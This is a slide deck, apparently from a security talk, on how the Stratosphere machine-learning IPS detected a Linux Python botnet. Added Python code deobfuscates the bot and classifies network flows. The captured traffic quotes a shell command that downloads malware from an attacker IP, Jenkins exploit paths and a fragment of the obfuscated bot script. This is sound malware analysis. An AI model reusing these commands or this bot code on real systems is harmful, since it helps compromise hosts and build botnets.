1
Robots against robots: How a Machine Learning IDS detected a novel Linux Botnet
Sebastian Garcia
@eldracote
sebastian.garcia@agents.fel.cvut.cz
https://stratosphereips.org
bit.ly/SS-RvR
2
The Detection
January 18th, 2016.
Testing Stratosphere IPS in the University network.
We get an alert from the IDS about a malicious behavior:
147.32.xx.xx-23.247.5.27-25000-tcp [Global Frag Networks,US]:
88,H,H,h,H,H,h,h,h,h,h,H,h,H,H,H,H,H,H,H,H,H,H,H,H,H,h,h,h,h,H,
"For a long time there was a periodic connection (freq 5s-60s), to an uncommon port, with large flows of medium duration."
3
The Analysis: Visibility
Argus flow suite from Qosient.
Storage of 3,000 hosts continually (1 year ~= 80GB).
Back in time!
4
The Detected Connection
Sent: "+.............P.43.249.81.135.......?."
Recv: ".................................." (MBs)
Recv once: "import time as O000OO0O0O00OO00O"
43.249.81.135
No VirusTotal detection.
AS58879 Shanghai Anchang Network Security Technology Co.,L. China.
Last known domain: lyzqmir2.com. Minecraft server.
5
The Beginning: Jan 16th, 2016
103.242.134.118 port 33333/TCP [VT:7]
S:"/bin/sh: 0: can't access tty; job control turned off.$,"
S:"tomcat6 17547 0.0 0.0 7944 868 ? S 13:36 0:00 grep abcc.$"
S:"wget 23.247.5.27:435/abcc.c"
R:"ps aux |grep abcc.ccd /tmp.m"
23.247.5.27 port 435/TCP [VT:0]
23.247.5.27 port 25000/TCP (main CC)
"=...-== Love AV ==-:..Linux 3.2.0-4-amd64"
6
The Analysis
103.242.134.118 port 23031/TCP
"version:0.1"
"heartOK","hearta"
"deployOK:115.239.248.88:80:3:60 heartOK"
103.242.134.118 port 33333/TCP
"http://222.179.116.23:8080/theme/1/pys.py"
Python script?
7
Our computer attacking?
Hundreds of connections to IPs in China, port 80/UDP.
115.239.248.88 port 80/UDP [MoveInternet Network Technology Co.,Ltd.,CN]
A few KB of binary data sent.
Could not find a motive or explanation.
8
The Compromise
What we knew:
Tomcat involved.
Date range.
We found strange POSTs to Jenkins minutes before:
POST /jenkins/descriptor/hudson.model.DownloadService/byId/hudson.tasks.Maven.MavenInstaller/postBack
POST /jenkins/ajaxExecutors
Remote Jenkins code execution vulnerability. Metasploit module. CVE-2015-8103
9
The Python Botnet Script
import time as O000OO0O0O00OO00O
import math as O000O0OO0O0O00O0O
import socket as OO0000OOOOOO0O000
import os as OO00000000OO000OO
import base64 as O0O0OOOO00O0O00OO
import threading as O00O000000OOO0OO0
import random as O0OOO0O000OO0O00O
class fbiabcd8c (O00O000000OOO0OO0 .Thread ):
    def __init__ (O0000O0OOOOOOO0O0 ):
        O00O000000OOO0OO0 .Thread .__init__ (O0000O0OOOOOOO0O0 )
    def run (O0OO0OOOOO000O000 ):
        global SvneciA
        global fn023ca
        global fABRVUqfh
        if (fn023ca ==False ):
            return
        O00O0O00000OOO0OO =0
        while fABRVUqfh :
            O00O0O00000OOO0OO +=1
            if (SvneciA >=O00O0O00000OOO0OO ):
                O000OO0O0O00OO00O .sleep (1 )
            else :
                break
        fABRVUqfh =False
        try :
            FcANECa .send (O0O0OOOO00O0O00OO .b64decode ("dWRwU3RvcHBlZA=="))
10
The Python Botnet Script
Obfuscated. Deobfuscated by Veronica Valeros. Thx!
Threads.
C&C channel with 10s timeouts.
Receives orders and executes commands, including access to the OS.
Confuse analysts? Or DDoS?
Function to send random UDP data to IPs received from the C&C.
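Added example, not code from the talk or from the Stratosphere project: a small AST-based deobfuscator for the style of obfuscation shown on the previous slide. It resolves the O/0 import aliases back to the real module names, renames the remaining O/0 identifiers (the first parameter of a method becomes self, everything else v1, v2, ...), and replaces literal base64.b64decode("...") calls with the decoded bytes. The fragment from the slide is embedded as constructed input with its indentation restored and the open try: closed by a placeholder except so that it parses; the OBF_NAME pattern and the v-numbered names are choices of this example.

```python
import ast
import base64
import re

# Constructed sample: the obfuscated fragment from the slide, indentation
# restored and the dangling "try:" closed so that ast.parse accepts it.
OBFUSCATED = '''
import time as O000OO0O0O00OO00O
import math as O000O0OO0O0O00O0O
import socket as OO0000OOOOOO0O000
import os as OO00000000OO000OO
import base64 as O0O0OOOO00O0O00OO
import threading as O00O000000OOO0OO0
import random as O0OOO0O000OO0O00O
class fbiabcd8c (O00O000000OOO0OO0 .Thread ):
    def __init__ (O0000O0OOOOOOO0O0 ):
        O00O000000OOO0OO0 .Thread .__init__ (O0000O0OOOOOOO0O0 )
    def run (O0OO0OOOOO000O000 ):
        global SvneciA
        global fn023ca
        global fABRVUqfh
        if (fn023ca ==False ):
            return
        O00O0O00000OOO0OO =0
        while fABRVUqfh :
            O00O0O00000OOO0OO +=1
            if (SvneciA >=O00O0O00000OOO0OO ):
                O000OO0O0O00OO00O .sleep (1 )
            else :
                break
        fABRVUqfh =False
        try :
            FcANECa .send (O0O0OOOO00O0O00OO .b64decode ("dWRwU3RvcHBlZA=="))
        except Exception :
            pass
'''

# Identifiers built only from the letter O and the digit 0 (assumed pattern).
OBF_NAME = re.compile(r"^[O0]{6,}$")


class Deobfuscator(ast.NodeTransformer):
    def __init__(self):
        self.names = {}   # obfuscated identifier -> readable name
        self.counter = 0

    def _readable(self, name):
        if not OBF_NAME.match(name):
            return name
        if name not in self.names:
            self.counter += 1
            self.names[name] = f"v{self.counter}"
        return self.names[name]

    def visit_Import(self, node):
        # "import time as O000..." becomes "import time"; remember the alias
        for alias in node.names:
            if alias.asname and OBF_NAME.match(alias.asname):
                self.names[alias.asname] = alias.name
                alias.asname = None
        return node

    def visit_ClassDef(self, node):
        # The first parameter of each method is the instance: call it self
        for item in node.body:
            if isinstance(item, ast.FunctionDef) and item.args.args:
                first = item.args.args[0].arg
                if OBF_NAME.match(first):
                    self.names[first] = "self"
        return self.generic_visit(node)

    def visit_arg(self, node):
        node.arg = self._readable(node.arg)
        return node

    def visit_Name(self, node):
        node.id = self._readable(node.id)
        return node

    def visit_Call(self, node):
        self.generic_visit(node)   # renames the module alias first
        f = node.func
        # base64.b64decode("<literal>") -> the decoded bytes literal
        if (isinstance(f, ast.Attribute) and f.attr == "b64decode"
                and isinstance(f.value, ast.Name) and f.value.id == "base64"
                and len(node.args) == 1
                and isinstance(node.args[0], ast.Constant)
                and isinstance(node.args[0].value, str)):
            decoded = base64.b64decode(node.args[0].value)
            return ast.copy_location(ast.Constant(value=decoded), node)
        return node


def deobfuscate(source):
    """Return readable Python source for an O/0-obfuscated script."""
    tree = Deobfuscator().visit(ast.parse(source))
    ast.fix_missing_locations(tree)
    return ast.unparse(tree)


if __name__ == "__main__":
    print(deobfuscate(OBFUSCATED))
```

Running it prints the fragment as a normal threading.Thread subclass; the base64 literal sent to the C&C socket resolves to the command string b'udpStopped', which matches the UDP-sending function described on the slide.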
11
How did Machine Learning detect this?
12
Stratosphere IPS
https://stratosphereips.org/
Free Software
Machine Learning
Behavioral IPS
Protecting NGOs
13
Stratosphere IPS
Model network behaviors as a string of letters.
1 flow → 3 features → 1 letter
14
Behavior of Connections
15
Markov Chain Models
Create, train and store Markov Chain models.
16
Behavioral Detection
Trained Markov Models
Similarity to Unknown Traffic
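Added example, a simplified reimplementation in Python rather than Stratosphere's own code, covering both the "1 flow, 3 features, 1 letter" modelling slide and the Markov chain detection slides above. behavioral_string() maps each flow to one letter from its size, duration and periodicity (digits while periodicity cannot be computed yet, lower-case for periodic, upper-case for weakly periodic, and so on), preceded by a symbol for the gap to the previous flow ('.' under 5 s, ',' 5-60 s, '+' 1-5 min, '*' 5-60 min, '0' longer); this is how the alert string 88,H,H,h,... on the detection slide reads. MarkovModel trains a first-order chain on such a string and classify() picks the trained model under which unknown traffic is most likely. The size, duration and periodicity thresholds, the Laplace smoothing, the "normal" training string and the sample flows are assumptions of this example; the C&C training string is the one from the alert.

```python
import math
from collections import Counter, defaultdict

# One letter per flow. Row = periodicity class, column = size (small, medium,
# large) x duration (short, medium, long). Digits are used while there are not
# yet two inter-flow gaps to compare.
LETTERS = {
    "none": "123456789", "strong": "abcdefghi", "weak": "ABCDEFGHI",
    "weak_non": "rstuvwxyz", "strong_non": "RSTUVWXYZ",
}
# Symbol for the time since the previous flow: (upper bound in seconds, symbol).
GAPS = [(5, "."), (60, ","), (300, "+"), (3600, "*"), (float("inf"), "0")]
ALPHABET = "".join(LETTERS.values()) + "".join(s for _, s in GAPS)


# Thresholds below are assumptions for this example, not Stratosphere's values.
def size_class(nbytes):
    return 0 if nbytes < 250 else (1 if nbytes < 1100 else 2)


def duration_class(seconds):
    return 0 if seconds < 0.1 else (1 if seconds < 10 else 2)


def periodicity_class(t1, t2):
    """Compare the last two inter-flow gaps: near-equal gaps mean periodic."""
    if t1 is None or t2 is None:
        return "none"
    ratio = max(t1, t2) / max(min(t1, t2), 1e-9)
    if ratio <= 1.05:
        return "strong"
    if ratio <= 1.3:
        return "weak"
    if ratio <= 5.0:
        return "weak_non"
    return "strong_non"


def gap_symbol(seconds):
    return next(sym for limit, sym in GAPS if seconds < limit)


def behavioral_string(flows):
    """flows: time-ordered list of (start_seconds, duration_seconds, bytes)."""
    out = []
    for i, (start, dur, size) in enumerate(flows):
        t2 = start - flows[i - 1][0] if i >= 1 else None
        t1 = flows[i - 1][0] - flows[i - 2][0] if i >= 2 else None
        period = periodicity_class(t1, t2)
        if period != "none":          # gap symbol only once periodicity exists
            out.append(gap_symbol(t2))
        out.append(LETTERS[period][3 * size_class(size) + duration_class(dur)])
    return "".join(out)


class MarkovModel:
    """First-order Markov chain over behavioral symbols, Laplace smoothed."""

    def __init__(self, training_string):
        self.counts = defaultdict(Counter)
        for a, b in zip(training_string, training_string[1:]):
            self.counts[a][b] += 1

    def score(self, s):
        """Mean log-probability per transition of s under this model."""
        v = len(ALPHABET)
        logp = [math.log((self.counts[a][b] + 1) / (sum(self.counts[a].values()) + v))
                for a, b in zip(s, s[1:])]
        return sum(logp) / max(len(logp), 1)


def classify(s, models):
    """Label of the trained model under which the unknown string is most likely."""
    return max(models, key=lambda label: models[label].score(s))


# Training data: the C&C string is the alert from the detection slide, the
# "normal" string is constructed to look like irregular small web flows.
MODELS = {
    "cc": MarkovModel("88,H,H,h,H,H,h,h,h,h,h,H,h,H,H,H,H,H,H,H,H,H,H,H,H,H,h,h,h,h,H,"),
    "normal": MarkovModel("11,V.R*R.S+R.S*V,R.R+S.R"),
}

# Constructed flows (start s, duration s, bytes): a beacon every ~30 s with
# large medium-length flows, and an irregular burst of small short flows.
CC_FLOWS = [(0.0, 3.0, 5000), (30.0, 3.1, 5200), (60.2, 2.9, 4900), (90.1, 3.0, 5100),
            (120.0, 3.2, 5300), (150.3, 3.0, 5000), (182.0, 2.8, 4800), (212.0, 3.1, 5000)]
WEB_FLOWS = [(0.0, 0.05, 120), (3.0, 0.02, 90), (45.0, 0.4, 300), (46.0, 0.03, 80),
             (400.0, 0.05, 150), (401.5, 0.1, 200)]

if __name__ == "__main__":
    for name, flows in (("beacon", CC_FLOWS), ("web", WEB_FLOWS)):
        s = behavioral_string(flows)
        print(f"{name:6s} {s:16s} -> {classify(s, MODELS)}")
```

The beacon flows become 88,h,h,h,h,h,H and are attributed to the C&C model; the web flows become 11,V.R*R.S and to the normal model. In a real deployment the letter string is built per (source, destination, port, protocol) tuple as flows arrive, so a long-lived periodic connection to an uncommon port, like the one on port 25000/TCP above, keeps accumulating the same few transitions and drifts away from every benign model.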
17
Conclusion
Still unknown and hidden.
Could not be detected by usual protections.
No fingerprints, no reputations, no rootkits.
Continuous Visibility is paramount.
Behavioral Machine Learning is improving.
18
Questions? And Thanks!
Sebastian Garcia
sebastian.garcia@agents.fel.cvut.cz
@eldracote
Workshop Malware Traffic: bit.ly/SSdirtywork
Women in Automation 2024: Career session - explore career paths in automationWomen in Automation 2024: Career session - explore career paths in automation
Women in Automation 2024: Career session - explore career paths in automation
 
BoSEU24 | Bill Thompson | Talk From Another Century
BoSEU24 | Bill Thompson | Talk From Another CenturyBoSEU24 | Bill Thompson | Talk From Another Century
BoSEU24 | Bill Thompson | Talk From Another Century
 
Design pattern talk by Kaya Weers - 2024 (v2)
Design pattern talk by Kaya Weers - 2024 (v2)Design pattern talk by Kaya Weers - 2024 (v2)
Design pattern talk by Kaya Weers - 2024 (v2)
 
HCI Lesson 1 - Introduction to Human-Computer Interaction.pdf
HCI Lesson 1 - Introduction to Human-Computer Interaction.pdfHCI Lesson 1 - Introduction to Human-Computer Interaction.pdf
HCI Lesson 1 - Introduction to Human-Computer Interaction.pdf
 
React JS; all concepts. Contains React Features, JSX, functional & Class comp...
React JS; all concepts. Contains React Features, JSX, functional & Class comp...React JS; all concepts. Contains React Features, JSX, functional & Class comp...
React JS; all concepts. Contains React Features, JSX, functional & Class comp...
 
Arti Languages Pre Seed Pitchdeck 2024.pdf
Arti Languages Pre Seed Pitchdeck 2024.pdfArti Languages Pre Seed Pitchdeck 2024.pdf
Arti Languages Pre Seed Pitchdeck 2024.pdf
 
JET Technology Labs White Paper for Virtualized Security and Encryption Techn...
JET Technology Labs White Paper for Virtualized Security and Encryption Techn...JET Technology Labs White Paper for Virtualized Security and Encryption Techn...
JET Technology Labs White Paper for Virtualized Security and Encryption Techn...
 
Potential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and InsightsPotential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and Insights
 
Top 10 Hubspot Development Companies in 2024
Top 10 Hubspot Development Companies in 2024Top 10 Hubspot Development Companies in 2024
Top 10 Hubspot Development Companies in 2024
 
Automation Ops Series: Session 3 - Solutions management
Automation Ops Series: Session 3 - Solutions managementAutomation Ops Series: Session 3 - Solutions management
Automation Ops Series: Session 3 - Solutions management
 
Introduction-to-Wazuh-and-its-integration.pptx
Introduction-to-Wazuh-and-its-integration.pptxIntroduction-to-Wazuh-and-its-integration.pptx
Introduction-to-Wazuh-and-its-integration.pptx
 
A Glance At The Java Performance Toolbox
A Glance At The Java Performance ToolboxA Glance At The Java Performance Toolbox
A Glance At The Java Performance Toolbox
 
THE STATE OF STARTUP ECOSYSTEM - INDIA x JAPAN 2023
THE STATE OF STARTUP ECOSYSTEM - INDIA x JAPAN 2023THE STATE OF STARTUP ECOSYSTEM - INDIA x JAPAN 2023
THE STATE OF STARTUP ECOSYSTEM - INDIA x JAPAN 2023
 
QCon London: Mastering long-running processes in modern architectures
QCon London: Mastering long-running processes in modern architecturesQCon London: Mastering long-running processes in modern architectures
QCon London: Mastering long-running processes in modern architectures
 
Which standard is best for your content?
Which standard is best for your content?Which standard is best for your content?
Which standard is best for your content?
 
Generative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfGenerative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdf
 
QMMS Lesson 2 - Using MS Excel Formula.pdf
QMMS Lesson 2 - Using MS Excel Formula.pdfQMMS Lesson 2 - Using MS Excel Formula.pdf
QMMS Lesson 2 - Using MS Excel Formula.pdf
 
The Critical Role of Spatial Data in Today's Data Ecosystem
The Critical Role of Spatial Data in Today's Data EcosystemThe Critical Role of Spatial Data in Today's Data Ecosystem
The Critical Role of Spatial Data in Today's Data Ecosystem
 
Email Marketing Automation for Bonterra Impact Management (fka Social Solutio...
Email Marketing Automation for Bonterra Impact Management (fka Social Solutio...Email Marketing Automation for Bonterra Impact Management (fka Social Solutio...
Email Marketing Automation for Bonterra Impact Management (fka Social Solutio...
 

Robots against robots: How Machine Learning IDS detected a novel Linux Botnet

  • 5. The Beginning: Jan 16th, 2016
    103.242.134.118 port 33333/TCP [VT:7]
    S:"/bin/sh: 0: can't access tty; job control turned off.$,"
    S:"tomcat6 17547 0.0 0.0 7944 868 ? S 13:36 0:00 grep abcc.$"
    S:"wget 23.247.5.27:435/abcc.c"
    R:"ps aux |grep abcc.ccd /tmp.m"
    23.247.5.27 port 435/TCP [VT:0]
    23.247.5.27 port 25000/TCP (main CC)
    "=...-== Love AV ==-:..Linux 3.2.0-4-amd64"
  • 6. The Analysis
    103.242.134.118 port 23031/TCP
    "version:0.1"
    "heartOK","hearta"
    "deployOK:115.239.248.88:80:3:60 heartOK"
    103.242.134.118 port 33333/TCP
    "http://222.179.116.23:8080/theme/1/pys.py"
    Python script?
  • 7. Our computer Attacking?
    Hundreds of connections to IPs in China, port 80/UDP.
    115.239.248.88 port 80/UDP [MoveInternet Network Technology Co.,Ltd.,CN]
    Few Kb of binary data sent.
    Could not find a motive or explanation.
  • 8. The Compromise
    What we knew: Tomcat involved. Date range.
    We found strange POSTs to Jenkins minutes before:
    POST /jenkins/descriptor/hudson.model.DownloadService/byId/hudson.tasks.Maven.MavenInstaller/postBack
    POST /jenkins/ajaxExecutors
    Remote Jenkins code execution vulnerability. Metasploit module. CVE-2015-8103
  • 9. The Python Botnet Script
    import time as O000OO0O0O00OO00O
    import math as O000O0OO0O0O00O0O
    import socket as OO0000OOOOOO0O000
    import os as OO00000000OO000OO
    import base64 as O0O0OOOO00O0O00OO
    import threading as O00O000000OOO0OO0
    import random as O0OOO0O000OO0O00O
    class fbiabcd8c (O00O000000OOO0OO0 .Thread ):
        def __init__ (O0000O0OOOOOOO0O0 ):
            O00O000000OOO0OO0 .Thread .__init__ (O0000O0OOOOOOO0O0 )
        def run (O0OO0OOOOO000O000 ):
            global SvneciA
            global fn023ca
            global fABRVUqfh
            if (fn023ca ==False ):
                return
            O00O0O00000OOO0OO =0
            while fABRVUqfh :
                O00O0O00000OOO0OO +=1
                if (SvneciA >=O00O0O00000OOO0OO ):
                    O000OO0O0O00OO00O .sleep (1 )
                else :
                    break
            fABRVUqfh =False
            try :
                FcANECa .send (O0O0OOOO00O0O00OO .b64decode ("dWRwU3RvcHBlZA=="))
  • 10. The Python Botnet Script
    Obfuscated. Deobfuscated by Veronica Valeros. Thx!
    Threads.
    C&C channel with 10s timeouts.
    Receives orders and executes commands, including access to OS.
    Confuse analysts? or DDoS?
    Function to send random UDP data to IPs received by C&C.
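Two of the obfuscation tricks visible on slide 9, module aliases renamed to random-looking identifiers and strings hidden as base64, can be undone mechanically with Python's own AST. The block below is an added example for analysts, not the tool used by Veronica Valeros; SAMPLE is constructed in the style of the script (the `sock` name is a placeholder), and the base64 literal is the one shown on slide 9.

```python
import ast
import base64

# Constructed sample in the style of the slide's obfuscated bot script (not the
# real script): module aliases are random-looking names, strings are base64.
SAMPLE = '''
import time as O000OO0O0O00OO00O
import base64 as O0O0OOOO00O0O00OO
import threading as O00O000000OOO0OO0

class fbiabcd8c(O00O000000OOO0OO0.Thread):
    def run(self):
        O000OO0O0O00OO00O.sleep(1)
        sock.send(O0O0OOOO00O0O00OO.b64decode("dWRwU3RvcHBlZA=="))
'''

class Deobfuscator(ast.NodeTransformer):
    """Undo two cheap tricks: `import x as <junk>` aliasing and base64 strings."""
    def __init__(self):
        self.aliases = {}   # junk alias -> real module name
    def visit_Import(self, node):
        for alias in node.names:
            if alias.asname:
                self.aliases[alias.asname] = alias.name
                alias.asname = None      # `import time as X` -> `import time`
        return node
    def visit_Name(self, node):
        # Every use of a junk alias becomes the module's real name.
        if node.id in self.aliases:
            return ast.copy_location(ast.Name(id=self.aliases[node.id], ctx=node.ctx), node)
        return node
    def visit_Call(self, node):
        self.generic_visit(node)   # rename aliases inside the call first
        f = node.func
        # base64.b64decode("<literal>") folds to the decoded bytes constant.
        if (isinstance(f, ast.Attribute) and f.attr == "b64decode"
                and isinstance(f.value, ast.Name) and f.value.id == "base64"
                and len(node.args) == 1 and isinstance(node.args[0], ast.Constant)
                and isinstance(node.args[0].value, str)):
            try:
                decoded = base64.b64decode(node.args[0].value, validate=True)
            except ValueError:
                return node        # not valid base64: leave the call alone
            return ast.copy_location(ast.Constant(value=decoded), node)
        return node

def deobfuscate(source):
    """Return source with aliases resolved and base64 literals decoded."""
    tree = Deobfuscator().visit(ast.parse(source))
    return ast.unparse(ast.fix_missing_locations(tree))
```

Running `deobfuscate(SAMPLE)` turns the hidden literal into `b'udpStopped'`, which matches the "UDP data" function the next slide describes.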
  • 11. How did Machine Learning detect this?
  • 13. Stratosphere IPS
    Model network behaviors as a string of letters.
    1 flow, 3 features, 1 letter.
  • 15. Markov Chain Models
    Create, train and store Markov Chain models.
  • 16. Behavioral Detection
    Trained Markov Models. Similarity to Unknown Traffic.
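Slides 13, 15 and 16 describe one pipeline: each flow of a connection becomes a letter from three features, a Markov chain is trained on the resulting behaviour string, and unknown traffic is scored by its similarity to the trained chains. The block below is an added Python illustration of that pipeline, not Stratosphere's code: the letter table (size and duration bins, uppercase for a flow whose gap repeats the previous gap), the add-one smoothing and the two constructed flow sets are my own assumptions.

```python
import math
from collections import Counter

# Assumed, simplified alphabet (not Stratosphere's real one): one flow becomes one
# letter from three features, as the slides describe. Size and duration pick
# 'a'..'i'; a periodic flow (gap matches the previous gap) is uppercased.
SIZE_BINS = (1_000, 50_000)   # bytes: small / medium / large
DURATION_BINS = (1.0, 30.0)   # seconds: short / medium / long
ALPHABET = [chr(ord(c) + i) for c in "aA" for i in range(9)]

def _bin(value, bins):
    return sum(value > b for b in bins)          # 0, 1 or 2

def encode_flows(flows, tolerance=0.2):
    """flows: (start_time, total_bytes, duration) tuples of one src-dst-port tuple."""
    letters, prev_gap = [], None
    for i, (ts, nbytes, dur) in enumerate(flows):
        letter = chr(ord("a") + 3 * _bin(nbytes, SIZE_BINS) + _bin(dur, DURATION_BINS))
        gap = ts - flows[i - 1][0] if i else None
        periodic = (prev_gap is not None and gap is not None
                    and abs(gap - prev_gap) <= tolerance * prev_gap)
        letters.append(letter.upper() if periodic else letter)
        prev_gap = gap
    return "".join(letters)

class MarkovModel:
    """First-order Markov chain over behaviour letters with add-one smoothing."""
    def __init__(self):
        self.trans, self.out = Counter(), Counter()
    def train(self, s):
        for a, b in zip(s, s[1:]):
            self.trans[(a, b)] += 1
            self.out[a] += 1
    def score(self, s):
        """Mean log-probability per transition; higher means more similar."""
        if len(s) < 2:
            return float("-inf")
        lp = [math.log((self.trans[(a, b)] + 1) / (self.out[a] + len(ALPHABET)))
              for a, b in zip(s, s[1:])]
        return sum(lp) / len(lp)

def best_match(unknown, models):
    return max(models, key=lambda name: models[name].score(unknown))

# Constructed flows: a C&C-like host beacons every 30 s with ~5 KB flows of a few
# seconds; a benign host browses at irregular intervals with varied sizes.
CC_FLOWS = [(30.0 * i, 5_000 + (i % 3) * 200, 3.0) for i in range(40)]
WEB_FLOWS = list(zip((0, 2, 9, 30, 31, 80, 95, 96, 140, 300),
                     (800, 20_000, 300, 70_000, 500, 900, 30_000, 400, 600, 100_000),
                     (0.2, 0.5, 0.1, 2.0, 0.1, 0.3, 1.5, 0.1, 0.2, 40.0)))
MODELS = {"cc-beacon": MarkovModel(), "web": MarkovModel()}
MODELS["cc-beacon"].train(encode_flows(CC_FLOWS))
MODELS["web"].train(encode_flows(WEB_FLOWS))
```

The beaconing host encodes to a run of one uppercase letter, so a short unseen slice of it scores far closer to the "cc-beacon" chain than to the "web" chain, which is the comparison slide 16 calls similarity to unknown traffic.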
  • 17. Conclusion
    Still unknown and hidden.
    Could not be detected by usual protections.
    No fingerprints, no reputations, no rootkits.
    Continuous Visibility is paramount.
    Behavioral Machine Learning is improving.
  • 18. Questions? And Thanks!
    Sebastian Garcia
    sebastian.garcia@agents.fel.cvut.cz
    @eldracote
    Workshop Malware Traffic: bit.ly/SSdirtywork